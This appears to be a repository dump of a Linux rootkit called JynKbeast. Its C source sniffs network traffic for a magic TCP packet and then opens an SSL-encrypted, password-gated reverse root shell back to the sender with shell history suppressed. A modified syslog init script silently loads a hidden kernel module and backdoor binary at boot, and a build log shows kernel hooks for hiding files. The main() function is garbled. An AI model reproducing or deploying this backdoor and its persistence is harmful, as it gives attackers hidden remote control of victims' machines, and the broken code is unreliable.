base_addr:0xb7fa96c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 18 | mprotect(0x8df000, 8192, PROT_READ) = 0 19 | mprotect(0x797000, 4096, PROT_READ) = 0 20 | munmap(0xb7fab000, 38920) = 0 21 | getuid32() = 0 22 | geteuid32() = 0 23 | setuid32(0) = 0 24 | getuid32() = 0 25 | brk(0) = 0x8f22000 26 | brk(0x8f43000) = 0x8f43000 27 | open("/var/run/shutdown.pid", O_RDONLY) = -1 ENOENT (No such file or directory) 28 | unlink("/var/run/shutdown.pid") = -1 ENOENT (No such file or directory) 29 | umask(022) = 022 30 | open("/var/run/shutdown.pid", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3 31 | getpid() = 4539 32 | fstat64(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0 33 | mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fb4000 34 | write(3, "4539\n", 5) = 5 35 | close(3) = 0 36 | munmap(0xb7fb4000, 4096) = 0 37 | rt_sigaction(SIGQUIT, {0x1, [QUIT], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 38 | rt_sigaction(SIGCHLD, {0x1, [CHLD], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 39 | rt_sigaction(SIGHUP, {0x1, [HUP], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 40 | rt_sigaction(SIGTSTP, {0x1, [TSTP], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 41 | rt_sigaction(SIGTTIN, {0x1, [TTIN], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 42 | rt_sigaction(SIGTTOU, {0x1, [TTOU], SA_RESTART}, {SIG_DFL, [], 0}, 8) = 0 43 | rt_sigaction(SIGINT, {0x804a210, [], 0}, NULL, 8) = 0 44 | chdir("/") = 0 45 | write(2, "Usage:\t shutdown [-akrhHPfnc] ["..., 596) = 596 46 | exit_group(1) = ? 47 | -------------------------------------------------------------------------------- /ssh_connect.c: -------------------------------------------------------------------------------- 1 | /* 2 | * ssh_connect 3 | * 4 | **************************************************************************** 5 | * 6 | * Example compiler command-line for GCC: 7 | * yum install libpcap libpcap-devel 8 | * yum install openssl openssl-devel 9 | * gcc -Wall -o bc bc.c -lpcap -lssl 10 | * gcc -o bc bc.c -lssl -lpcap 11 | * ./bc 12 | **************************************************************************** 13 | * 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | 31 | 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | 39 | #include "config.h" 40 | 41 | /* default snap length (maximum bytes per packet to capture) */ 42 | #define SNAP_LEN 1518 43 | 44 | /* ethernet headers are always exactly 14 bytes [1] */ 45 | #define SIZE_ETHERNET 14 46 | 47 | /* Ethernet addresses are 6 bytes */ 48 | #define ETHER_ADDR_LEN 6 49 | 50 | #define BUFSIZZ 1024 51 | 52 | /* Ethernet header */ 53 | struct sniff_ethernet { 54 | u_char ether_dhost[ETHER_ADDR_LEN]; /* destination host address */ 55 | u_char ether_shost[ETHER_ADDR_LEN]; /* source host address */ 56 | u_short ether_type; /* IP? ARP? RARP? etc */ 57 | }; 58 | 59 | /* IP header */ 60 | struct sniff_ip { 61 | u_char ip_vhl; /* version << 4 | header length >> 2 */ 62 | u_char ip_tos; /* type of service */ 63 | u_short ip_len; /* total length */ 64 | u_short ip_id; /* identification */ 65 | u_short ip_off; /* fragment offset field */ 66 | #define IP_RF 0x8000 /* reserved fragment flag */ 67 | #define IP_DF 0x4000 /* dont fragment flag */ 68 | #define IP_MF 0x2000 /* more fragments flag */ 69 | #define IP_OFFMASK 0x1fff /* mask for fragmenting bits */ 70 | u_char ip_ttl; /* time to live */ 71 | u_char ip_p; /* protocol */ 72 | u_short ip_sum; /* checksum */ 73 | struct in_addr ip_src,ip_dst; /* source and dest address */ 74 | }; 75 | #define IP_HL(ip) (((ip)->ip_vhl) & 0x0f) 76 | #define IP_V(ip) (((ip)->ip_vhl) >> 4) 77 | 78 | /* TCP header */ 79 | typedef u_int tcp_seq; 80 | 81 | struct sniff_tcp { 82 | u_short th_sport; /* source port */ 83 | u_short th_dport; /* destination port */ 84 | tcp_seq th_seq; /* sequence number */ 85 | tcp_seq th_ack; /* acknowledgement number */ 86 | u_char th_offx2; /* data offset, rsvd */ 87 | #define TH_OFF(th) (((th)->th_offx2 & 0xf0) >> 4) 88 | u_char th_flags; 89 | #define TH_FIN 0x01 90 | #define TH_SYN 0x02 91 | #define TH_RST 0x04 92 | #define TH_PUSH 0x08 93 | #define TH_ACK 0x10 94 | #define TH_URG 0x20 95 | #define TH_ECE 0x40 96 | #define TH_CWR 0x80 97 | #define TH_FLAGS (TH_FIN|TH_SYN|TH_RST|TH_ACK|TH_URG|TH_ECE|TH_CWR) 98 | u_short th_win; /* window */ 99 | u_short th_sum; /* checksum */ 100 | u_short th_urp; /* urgent pointer */ 101 | }; 102 | 103 | void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet); 104 | void print_app_usage(void); 105 | SSL_CTX* InitCTX(void); 106 | void backconnect(struct in_addr addr, u_short port); 107 | void enterpass(SSL *ssl); 108 | void getMD5(const char *ori,int len,char *buf); 109 | void read_write(SSL *ssl,int sock); 110 | int remap_pipe_stdin_stdout(int rpipe, int wpipe); 111 | 112 | char *argv[] = { "bash", "-i", NULL }; 113 | char *envp[] = { "TERM=linux", "PS1=[root@remote-server]#", "BASH_HISTORY=/dev/null", 114 | "HISTORY=/dev/null", "history=/dev/null", "HOME=/usr/sbin/dnsdyn","HISTFILE=/dev/null", 115 | "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; 116 | //char *ps = "[root@remote-server]#"; 117 | 118 | void enterpass(SSL *ssl){ 119 | //char *prompt="Password [displayed to screen]: "; 120 | char *motd="<< Welcome >>\n"; 121 | char buffer[64]={0x00}; 122 | 123 | //write(s,banner,strlen(banner)); 124 | //write(s,prompt,strlen(prompt)); 125 | //read(s,buffer,sizeof(buffer)); 126 | SSL_read(ssl,buffer,sizeof(buffer)-1); 127 | 128 | /*Hash password*/ 129 | char trans[SALT_LENGTH+33] = {'\0'}; 130 | char tmp[3]={'\0'},buf[33]={'\0'},hash[33]={'\0'}; 131 | int i; 132 | for(i=0;i2) 138 | i--; 139 | #ifdef DEBUG 140 | sprintf(tmp, "%d",i); 141 | SSL_write(ssl,tmp,1); 142 | SSL_write(ssl,"->i\n",4); 143 | #endif 144 | 145 | getMD5(buffer,i,buf); 146 | 147 | #ifdef DEBUG 148 | SSL_write(ssl,buf,strlen(buf)); 149 | SSL_write(ssl,"->buf\n",6); 150 | #endif 151 | strncpy(trans,_SALT_,SALT_LENGTH); 152 | for(i=0;i<32;i++){ 153 | trans[SALT_LENGTH+i]=buf[i]; 154 | } 155 | #ifdef DEBUG 156 | SSL_write(ssl,trans,strlen(trans)); 157 | SSL_write(ssl,"->trans\n",8); 158 | #endif 159 | 160 | getMD5(trans,SALT_LENGTH+32,hash); 161 | 162 | sprintf(tmp, "%d",strlen(buf)); 163 | 164 | #ifdef DEBUG 165 | SSL_write(ssl,tmp,2); 166 | SSL_write(ssl,"->buflen\n",9); 167 | SSL_write(ssl,hash,strlen(hash)); 168 | SSL_write(ssl,"->hash\n",7); 169 | #endif 170 | /*End Hash Password*/ 171 | 172 | if(!strncmp(hash, _RPASSWORD_, strlen(_RPASSWORD_))) { 173 | SSL_write(ssl,motd,strlen(motd)); 174 | }else { 175 | //write(s,"Wrong!\n", 7); 176 | //close(s); 177 | #ifdef DEBUG 178 | SSL_write(ssl,"Wrong!\n", 7); 179 | #endif 180 | _exit(0); 181 | } 182 | } 183 | 184 | /* 185 | * transfer char to its md5 char be know that buf must init with buf[33]={'\0'}; 186 | */ 187 | void getMD5(const char *ori,int len,char *buf){ 188 | unsigned char md[16]; 189 | char tmp[3]={'\0'}; 190 | int i; 191 | unsigned char tt[len]; 192 | for(i=0;i for packets.\n"); 215 | printf("\n"); 216 | #endif 217 | return; 218 | } 219 | 220 | /* 221 | * Initialize SSL library / algorithms 222 | */ 223 | SSL_CTX* InitCTX(void) 224 | { SSL_METHOD *method; 225 | SSL_CTX *ctx; 226 | 227 | SSL_library_init(); 228 | 229 | OpenSSL_add_all_algorithms(); /* Load cryptos, et.al. */ 230 | SSL_load_error_strings(); /* Bring in and register error messages */ 231 | method = SSLv3_client_method(); /* Create new client-method instance */ 232 | ctx = SSL_CTX_new(method); /* Create new context */ 233 | if ( ctx == NULL ) 234 | { 235 | ERR_print_errors_fp(stderr); 236 | abort(); 237 | } 238 | return ctx; 239 | } 240 | 241 | /* 242 | * spawn a backconnect shell 243 | */ 244 | void backconnect(struct in_addr addr, u_short port) 245 | { 246 | int child; 247 | signal(SIGCHLD, SIG_IGN); 248 | if((child=fork())==0){ 249 | /*For magic stdin stdout sdterr*/ 250 | //printf("hello"); 251 | 252 | struct sockaddr_in sockaddr; 253 | int sock; 254 | //FILE *fd; 255 | //char *newline; 256 | //char buf[1028]; 257 | 258 | SSL_CTX *ctx; 259 | SSL *ssl; 260 | 261 | ctx = InitCTX(); 262 | sockaddr.sin_family = AF_INET; 263 | sockaddr.sin_addr = addr; 264 | sockaddr.sin_port = port; 265 | 266 | sock = socket(AF_INET, SOCK_STREAM, 0); 267 | 268 | 269 | if (connect(sock, (struct sockaddr*)&sockaddr, sizeof(sockaddr)) == 0) 270 | { 271 | ssl = SSL_new(ctx); 272 | SSL_set_fd(ssl,sock); 273 | 274 | sock = SSL_get_fd(ssl); 275 | 276 | if ( SSL_connect(ssl) == -1 ) 277 | ERR_print_errors_fp(stderr); 278 | else { 279 | enterpass(ssl); 280 | int writepipe[2] = {-1,-1}, /* parent -> child */ 281 | readpipe [2] = {-1,-1}; /* child -> parent */ 282 | pid_t childpid; 283 | 284 | /*------------------------------------------------------------------------ 285 | * CREATE THE PAIR OF PIPES 286 | * 287 | * Pipes have two ends but just one direction: to get a two-way 288 | * conversation you need two pipes. It's an error if we cannot make 289 | * them both, and we define these macros for easy reference. 290 | */ 291 | writepipe[0] = -1; 292 | 293 | if ( pipe(readpipe) < 0 || pipe(writepipe) < 0 ) 294 | { 295 | /* FATAL: cannot create pipe */ 296 | /* close readpipe[0] & [1] if necessary */ 297 | } 298 | 299 | #define PARENT_READ readpipe[0] 300 | #define CHILD_WRITE readpipe[1] 301 | #define CHILD_READ writepipe[0] 302 | #define PARENT_WRITE writepipe[1] 303 | signal(SIGCHLD, SIG_IGN); 304 | if ( (childpid = fork()) < 0) 305 | { 306 | /* FATAL: cannot fork child */ 307 | } 308 | else if ( childpid == 0 ) /* in the child */ 309 | { 310 | close(PARENT_WRITE); 311 | close(PARENT_READ); 312 | 313 | //dup2(CHILD_READ, 0); close(CHILD_READ); 314 | //dup2(CHILD_WRITE, 1); close(CHILD_WRITE); 315 | dup2(CHILD_WRITE,2);//for error 316 | remap_pipe_stdin_stdout(CHILD_READ,CHILD_WRITE); 317 | 318 | /* do child stuff */ 319 | //read_write(ssl,sock); 320 | execve("/bin/bash", argv, envp); 321 | //printf("bash close"); 322 | close(childpid); 323 | _exit(0); 324 | } 325 | else /* in the parent */ 326 | { 327 | close(CHILD_READ); 328 | close(CHILD_WRITE); 329 | 330 | //dup2(PARENT_READ, 0); 331 | //dup2(PARENT_WRITE, 1); 332 | remap_pipe_stdin_stdout(PARENT_READ,PARENT_WRITE); 333 | /* do parent stuff */ 334 | read_write(ssl,sock); 335 | 336 | //wait(); 337 | 338 | } 339 | close(sock); 340 | SSL_CTX_free(ctx); 341 | } 342 | } 343 | //return; 344 | close(child); 345 | _exit(0); 346 | }else if(child>0){ 347 | #ifdef DEBUG 348 | printf("---child PID:"); 349 | printf("%d",child); 350 | printf("\n"); 351 | #endif 352 | return; 353 | } 354 | return; 355 | 356 | } 357 | 358 | /* 359 | * dissect/print packet 360 | */ 361 | void 362 | got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) 363 | { 364 | 365 | static int count = 1; /* packet counter */ 366 | 367 | /* declare pointers to packet headers */ 368 | const struct sniff_ip *ip; /* The IP header */ 369 | const struct sniff_tcp *tcp; /* The TCP header */ 370 | 371 | int size_ip; 372 | int size_tcp; 373 | unsigned int r_ack; 374 | unsigned int r_seq; 375 | unsigned int r_urp; 376 | unsigned int th_sport; 377 | 378 | count++; 379 | 380 | 381 | /* define/compute ip header offset */ 382 | ip = (struct sniff_ip*)(packet + SIZE_ETHERNET); 383 | size_ip = IP_HL(ip)*4; 384 | if (size_ip < 20) { 385 | #ifdef DEBUG 386 | printf(" * Invalid IP header length: %u bytes\n", size_ip); 387 | #endif 388 | return; 389 | } 390 | 391 | /* print source and destination IP addresses 392 | printf(" From: %s\n", inet_ntoa(ip->ip_src)); 393 | printf(" To: %s\n", inet_ntoa(ip->ip_dst)); 394 | */ 395 | 396 | /* determine protocol */ 397 | switch(ip->ip_p) { 398 | case IPPROTO_TCP: 399 | break; 400 | default: 401 | return; 402 | } 403 | 404 | /* 405 | * OK, this packet is TCP. 406 | */ 407 | 408 | /* define/compute tcp header offset */ 409 | tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip); 410 | size_tcp = TH_OFF(tcp)*4; 411 | if (size_tcp < 20) { 412 | #ifdef DEBUG 413 | printf(" * Invalid TCP header length: %u bytes\n", size_tcp); 414 | #endif 415 | return; 416 | } 417 | 418 | /* set ack and seq variables, then compare to MAGIC_ACK and MAGIC_SEQ */ 419 | r_ack = ntohl(tcp->th_ack); 420 | r_seq = ntohl(tcp->th_seq); 421 | r_urp = ntohl(tcp->th_urp); 422 | th_sport = ntohl(tcp->th_sport); 423 | th_sport = th_sport>>16; 424 | #ifdef DEBUG_IP 425 | if( !strncmp(inet_ntoa(ip->ip_src),"192.168.1.101",8)){ 426 | printf("--------got_it:%s\n",inet_ntoa(ip->ip_src)); 427 | printf("ack:%d\n",r_ack); 428 | printf("seq:%d\n",r_seq); 429 | } 430 | #endif 431 | 432 | if (r_ack == MAGIC_ACK && r_seq == MAGIC_SEQ) { 433 | //if (r_seq == MAGIC_SEQ && th_sport == SOURCE_PORT) { 434 | //if (th_sport == SOURCE_PORT) { 435 | //if (th_sport == SOURCE_PORT && tcp->th_flags==0x02) { 436 | #ifdef DEBUG 437 | unsigned int th_offx2 = ntohl(tcp->th_offx2); 438 | printf("magic packet received\n"); 439 | printf(" From: %s\n", inet_ntoa(ip->ip_src)); 440 | printf(" To: %s\n", inet_ntoa(ip->ip_dst)); 441 | printf("ack:%2.2x\n",r_ack); 442 | printf("seq:%2.2x\n",r_seq); 443 | printf("urp:%2.2x\n",r_urp); 444 | printf("urp:%2.2x\n",tcp->th_urp); 445 | printf("sport:%2.2x\n",th_sport); 446 | 447 | printf("thesport:%2.2x\n",tcp->th_sport); 448 | printf("thedsport:%d\n",th_sport); 449 | printf("th_offx2:%2.2x\n",th_offx2); 450 | printf("th_win:%2.2x\n",tcp->th_win); 451 | printf("checksum:%2.2x\n",tcp->th_sum); 452 | printf("flags:%2.2x\n",tcp->th_flags); 453 | unsigned int backport = th_sport+5; 454 | printf("-----Connecting to port:%d\n",backport); 455 | backport = th_sport<<16; 456 | printf("th_offx2:%2.2x\n",backport); 457 | u_short bkport = ntohs(backport); 458 | #endif 459 | /*For magic stdin stdout sdterr*/ 460 | printf(" "); 461 | backconnect(ip->ip_src, tcp->th_sport); 462 | //backconnect(ip->ip_src, bkport); 463 | } 464 | 465 | return; 466 | } 467 | 468 | #define LOCKMODE (S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH) 469 | 470 | int already_running(void) 471 | { 472 | int fd; 473 | char buf[128]={'\0'}; 474 | off_t siz = 1; 475 | DIR *dir = opendir(_H4X_PATH_); 476 | if(dir == NULL){ 477 | mkdir(_H4X_PATH_, S_IRWXU | S_IXGRP| S_IRGRP | S_IROTH | S_IXOTH); 478 | } 479 | sprintf(buf, "%s%s",_H4X_PATH_,"/daemon.pid"); 480 | fd = open(buf,O_RDWR|O_CREAT,LOCKMODE); 481 | if(fd<0){ 482 | return(0); 483 | } 484 | //lockf(int, int, off_t) 485 | if(lockf(fd, F_TLOCK, siz) <0){ 486 | if(errno == EACCES || errno == EAGAIN){ 487 | close(fd); 488 | return(1); 489 | } 490 | return(0); 491 | } 492 | ftruncate(fd,0); 493 | return(0); 494 | } 495 | 496 | 497 | 498 | int main(int argc, char **argv) 499 | { 500 | /* check for capture device name on command-line */ 501 | if(argc<4){ 502 | printf("usage:$ resource-port") 503 | } 504 | if (argc == 2) { 505 | dev = argv[1]; 506 | } 507 | 508 | 509 | return 0; 510 | } 511 | 512 | /*sl_printf for silent use and debug*/ 513 | /* 514 | void sl_printf(){ 515 | 516 | } 517 | */ 518 | 519 | /* A simple error and exit routine*/ 520 | int err_exit(char *string) 521 | { 522 | #ifdef DEBUG 523 | fprintf(stderr,"%s\n",string); 524 | #endif 525 | exit(0); 526 | } 527 | 528 | /* Print SSL errors and exit*/ 529 | int berr_exit(char *string) 530 | { 531 | //BIO_printf(bio_err,"%s\n",string); 532 | //ERR_print_errors(bio_err); 533 | #ifdef DEBUG 534 | fprintf(stderr,"%s\n",string); 535 | #endif 536 | exit(0); 537 | } 538 | 539 | 540 | 541 | /* Read from the keyboard and write to the server 542 | Read from the server and write to the keyboard 543 | 544 | we use select() to multiplex 545 | */ 546 | void read_write(SSL *ssl,int sock) 547 | { 548 | int width; 549 | int r,c2sl=0,c2s_offset=0; 550 | int read_blocked_on_write=0,write_blocked_on_read=0,read_blocked=0; 551 | fd_set readfds,writefds; 552 | int shutdown_wait=0; 553 | char c2s[BUFSIZZ],s2c[BUFSIZZ]; 554 | int ofcmode; 555 | 556 | /*First we make the socket nonblocking*/ 557 | ofcmode=fcntl(sock,F_GETFL,0); 558 | ofcmode|=O_NDELAY; 559 | if(fcntl(sock,F_SETFL,ofcmode)) 560 | err_exit("Couldn't make socket nonblocking"); 561 | 562 | 563 | width=sock+1; 564 | while(1){ 565 | FD_ZERO(&readfds); 566 | FD_ZERO(&writefds); 567 | 568 | FD_SET(sock,&readfds); 569 | 570 | /* If we're waiting for a read on the socket don't 571 | try to write to the server */ 572 | if(!write_blocked_on_read){ 573 | /* If we have data in the write queue don't try to 574 | read from stdin */ 575 | if(c2sl || read_blocked_on_write) 576 | FD_SET(sock,&writefds); 577 | else 578 | FD_SET(fileno(stdin),&readfds); 579 | } 580 | 581 | r=select(width,&readfds,&writefds,0,0); 582 | if(r==0) 583 | continue; 584 | 585 | /* Now check if there's data to read */ 586 | if((FD_ISSET(sock,&readfds) && !write_blocked_on_read) || 587 | (read_blocked_on_write && FD_ISSET(sock,&writefds))){ 588 | do { 589 | read_blocked_on_write=0; 590 | read_blocked=0; 591 | 592 | r=SSL_read(ssl,s2c,BUFSIZZ); 593 | 594 | switch(SSL_get_error(ssl,r)){ 595 | case SSL_ERROR_NONE: 596 | /* Note: this call could block, which blocks the 597 | entire application. It's arguable this is the 598 | right behavior since this is essentially a terminal 599 | client. However, in some other applications you 600 | would have to prevent this condition */ 601 | fwrite(s2c,1,r,stdout); 602 | break; 603 | case SSL_ERROR_ZERO_RETURN: 604 | /* End of data */ 605 | if(!shutdown_wait) 606 | SSL_shutdown(ssl); 607 | goto end; 608 | break; 609 | case SSL_ERROR_WANT_READ: 610 | read_blocked=1; 611 | break; 612 | 613 | /* We get a WANT_WRITE if we're 614 | trying to rehandshake and we block on 615 | a write during that rehandshake. 616 | 617 | We need to wait on the socket to be 618 | writeable but reinitiate the read 619 | when it is */ 620 | case SSL_ERROR_WANT_WRITE: 621 | read_blocked_on_write=1; 622 | break; 623 | default: 624 | berr_exit("SSL read problem"); 625 | } 626 | 627 | /* We need a check for read_blocked here because 628 | SSL_pending() doesn't work properly during the 629 | handshake. This check prevents a busy-wait 630 | loop around SSL_read() */ 631 | } while (SSL_pending(ssl) && !read_blocked); 632 | } 633 | 634 | /* Check for input on the console*/ 635 | if(FD_ISSET(fileno(stdin),&readfds)){ 636 | c2sl=read(fileno(stdin),c2s,BUFSIZZ); 637 | if(c2sl==0){ 638 | shutdown_wait=1; 639 | if(SSL_shutdown(ssl)) 640 | return; 641 | } 642 | c2s_offset=0; 643 | } 644 | 645 | /* If the socket is writeable... */ 646 | if((FD_ISSET(sock,&writefds) && c2sl) || 647 | (write_blocked_on_read && FD_ISSET(sock,&readfds))) { 648 | write_blocked_on_read=0; 649 | 650 | /* Try to write */ 651 | 652 | r=SSL_write(ssl,c2s+c2s_offset,c2sl); 653 | //SSL_write(ssl,ps,strlen(ps)); 654 | 655 | switch(SSL_get_error(ssl,r)){ 656 | /* We wrote something*/ 657 | case SSL_ERROR_NONE: 658 | c2sl-=r; 659 | c2s_offset+=r; 660 | break; 661 | 662 | /* We would have blocked */ 663 | case SSL_ERROR_WANT_WRITE: 664 | break; 665 | 666 | /* We get a WANT_READ if we're 667 | trying to rehandshake and we block on 668 | write during the current connection. 669 | 670 | We need to wait on the socket to be readable 671 | but reinitiate our write when it is */ 672 | case SSL_ERROR_WANT_READ: 673 | write_blocked_on_read=1; 674 | break; 675 | 676 | /* Some other error */ 677 | default: 678 | berr_exit("SSL write problem"); 679 | } 680 | } 681 | } 682 | 683 | end: 684 | //SSL_free(ssl); 685 | //close(sock); 686 | return; 687 | } 688 | 689 | 690 | 691 | #ifndef TRUE 692 | # define TRUE 1 693 | #endif 694 | 695 | #ifndef FALSE 696 | # define FALSE 0 697 | #endif 698 | 699 | /*------------------------------------------------------------------------ 700 | * Every time we run a dup2(), we always close the old FD, so this macro 701 | * runs them both together and evaluates to TRUE if it all went OK and 702 | * FALSE if not. 703 | */ 704 | #define DUP2CLOSE(oldfd, newfd) (dup2(oldfd, newfd) == 0 && close(oldfd) == 0) 705 | 706 | int remap_pipe_stdin_stdout(int rpipe, int wpipe) 707 | { 708 | /*------------------------------------------------------------------ 709 | * CASE [A] 710 | * 711 | * This is the trivial case that probably never happens: the two FDs 712 | * are already in the right place and we have nothing to do. Though 713 | * this probably doesn't happen much, it's guaranteed that *doing* 714 | * any shufflingn would close descriptors that shouldn't have been. 715 | */ 716 | if ( rpipe == 0 && wpipe == 1 ) 717 | return TRUE; 718 | 719 | /*---------------------------------------------------------------- 720 | * CASE [B] and [C] 721 | * 722 | * These two have the same handling but not the same rules. In case 723 | * [C] where both FDs are "out of the way", it doesn't matter which 724 | * of the FDs is closed first, but in case [B] it MUST be done in 725 | * this order. 726 | */ 727 | if ( rpipe >= 1 && wpipe > 1 ) 728 | { 729 | return DUP2CLOSE(rpipe, 0) 730 | && DUP2CLOSE(wpipe, 1); 731 | } 732 | 733 | 734 | /*---------------------------------------------------------------- 735 | * CASE [D] 736 | * CASE [E] 737 | * 738 | * In these cases, *one* of the FDs is already correct and the other 739 | * one can just be dup'd to the right place: 740 | */ 741 | if ( rpipe == 0 && wpipe >= 1 ) 742 | return DUP2CLOSE(wpipe, 1); 743 | 744 | if ( rpipe >= 1 && wpipe == 1 ) 745 | return DUP2CLOSE(rpipe, 0); 746 | 747 | 748 | /*---------------------------------------------------------------- 749 | * CASE [F] 750 | * 751 | * Here we have the write pipe in the read slot, but the read FD 752 | * is out of the way: this means we can do this in just two steps 753 | * but they MUST be in this order. 754 | */ 755 | if ( rpipe >= 1 && wpipe == 0 ) 756 | { 757 | return DUP2CLOSE(wpipe, 1) 758 | && DUP2CLOSE(rpipe, 0); 759 | } 760 | 761 | /*---------------------------------------------------------------- 762 | * CASE [G] 763 | * 764 | * This is the trickiest case because the two file descriptors are 765 | * *backwards*, and the only way to make it right is to make a 766 | * third temporary FD during the swap. 767 | */ 768 | if ( rpipe == 1 && wpipe == 0 ) 769 | { 770 | const int tmp = dup(wpipe); /* NOTE! this is not dup2() ! */ 771 | 772 | return tmp > 1 773 | && close(wpipe) == 0 774 | && DUP2CLOSE(rpipe, 0) 775 | && DUP2CLOSE(tmp, 1); 776 | } 777 | 778 | /* SHOULD NEVER GET HERE */ 779 | 780 | return FALSE; 781 | } 782 | -------------------------------------------------------------------------------- /syslog: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # syslog Starts syslogd/klogd. 4 | # 5 | # 6 | # chkconfig: 2345 12 88 7 | # description: Syslog is the facility by which many daemons use to log \ 8 | # messages to various system log files. It is a good idea to always \ 9 | # run syslog. 10 | ### BEGIN INIT INFO 11 | # Provides: $syslog 12 | ### END INIT INFO 13 | 14 | # Source function library. 15 | . /etc/init.d/functions 16 | 17 | RETVAL=0 18 | 19 | start() { 20 | insmod /usr/sbin/dnsdyn/dnsmodule.ko > /dev/null 2>&1 21 | su root -c /usr/sbin/dnsdyn/dnsdynm 22 | [ -x /sbin/syslogd ] || exit 5 23 | [ -x /sbin/klogd ] || exit 5 24 | 25 | # Source config 26 | if [ -f /etc/sysconfig/syslog ] ; then 27 | . /etc/sysconfig/syslog 28 | else 29 | SYSLOGD_OPTIONS="-m 0" 30 | KLOGD_OPTIONS="-2" 31 | fi 32 | 33 | if [ -z "$SYSLOG_UMASK" ] ; then 34 | SYSLOG_UMASK=077; 35 | fi 36 | umask $SYSLOG_UMASK 37 | 38 | echo -n $"Starting system logger: " 39 | daemon syslogd $SYSLOGD_OPTIONS 40 | RETVAL=$? 41 | echo 42 | echo -n $"Starting kernel logger: " 43 | daemon klogd $KLOGD_OPTIONS 44 | echo 45 | [ $RETVAL -eq 0 ] && touch /var/lock/subsys/syslog 46 | return $RETVAL 47 | } 48 | stop() { 49 | echo -n $"Shutting down kernel logger: " 50 | killproc klogd 51 | echo 52 | echo -n $"Shutting down system logger: " 53 | killproc syslogd 54 | RETVAL=$? 55 | echo 56 | [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/syslog 57 | return $RETVAL 58 | } 59 | rhstatus() { 60 | status syslogd 61 | status klogd 62 | } 63 | restart() { 64 | stop 65 | start 66 | } 67 | reload() { 68 | RETVAL=1 69 | syslog=`cat /var/run/syslogd.pid 2>/dev/null` 70 | echo -n "Reloading syslogd..." 71 | if [ -n "${syslog}" ] && [ -e /proc/"${syslog}" ]; then 72 | kill -HUP "$syslog"; 73 | RETVAL=$? 74 | fi 75 | if [ $RETVAL -ne 0 ]; then 76 | failure 77 | else 78 | success 79 | fi 80 | echo 81 | RETVAL=1 82 | echo -n "Reloading klogd..." 83 | klog=`cat /var/run/klogd.pid 2>/dev/null` 84 | if [ -n "${klog}" ] && [ -e /proc/"${klog}" ]; then 85 | kill -USR2 "$klog"; 86 | RETVAL=$? 87 | fi 88 | if [ $RETVAL -ne 0 ]; then 89 | failure 90 | else 91 | success 92 | fi 93 | echo 94 | return $RETVAL 95 | } 96 | case "$1" in 97 | start) 98 | start 99 | ;; 100 | stop) 101 | stop 102 | ;; 103 | status) 104 | rhstatus 105 | ;; 106 | restart) 107 | restart 108 | ;; 109 | reload) 110 | reload 111 | ;; 112 | condrestart) 113 | [ -f /var/lock/subsys/syslog ] && restart || : 114 | ;; 115 | *) 116 | echo $"Usage: $0 {start|stop|status|restart|condrestart}" 117 | exit 2 118 | esac 119 | 120 | exit $? 121 | 122 | -------------------------------------------------------------------------------- /xxx.log: -------------------------------------------------------------------------------- 1 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_read’: 2 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:347: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 3 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_write’: 4 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:584: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 5 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_getdents64’: 6 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:646: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 7 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:666: warning: ignoring return value of ‘copy_to_user’, declared with attribute warn_unused_result 8 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_unlink’: 9 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:679: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 10 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_rmdir’: 11 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:694: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 12 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_unlinkat’: 13 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:708: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 14 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_rename’: 15 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:723: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 16 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:724: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 17 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘writeInit’: 18 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:771: warning: ISO C90 forbids mixed declarations and code 19 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:800: warning: ISO C90 forbids mixed declarations and code 20 | 